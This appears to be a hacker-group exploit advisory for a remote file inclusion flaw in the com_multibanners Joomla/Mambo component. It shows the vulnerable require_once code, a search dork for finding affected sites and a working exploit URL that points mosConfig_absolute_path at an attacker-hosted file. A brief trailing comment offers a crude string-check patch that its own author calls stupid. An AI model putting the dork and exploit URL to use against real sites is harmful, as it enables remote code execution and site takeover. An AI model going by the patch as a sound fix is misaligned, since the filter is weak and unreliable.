#############################SolpotCrew Community################################
#
# Com Multibanners Remote File Inclusion (mosConfig_absolute_path)
#
# original advisory : http://solpotcrew.org/adv/BlueSpy-adv-multibanners.txt
#
################################################## ###############################
#
#
# Bug Found By :Blue|Spy
#
# contact: mail@blue-spy.net
#
# Website : http://kunamgede.biz, http://blue-spy.net
#
################################################## ##############################
#
#
# Greetz: h4ntu , Fungky, Solpot, Matdhule
# and all crew #mardongan @ irc.dal.net
#
#
################################################## #############################
code from extadminmenus.class.php

if (phpversion() < '4.2.0') {
require_once( $mosConfig_absolute_path . '/includes/compat.php41x.php' );
}
if (phpversion() < '4.3.0') {
require_once( $mosConfig_absolute_path . '/includes/compat.php42x.php' );
}


Dork:
inurl:com_multibanners

exploit:
http://site.com/[path]//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=[attacker]

is there any solution?

i did that way:

$position_url = strpos ($mosConfig_absolute_path, "http");
if (!($position_url === false)) { die( 'hack attempt prevented'); }

i know its stupid, but it helps.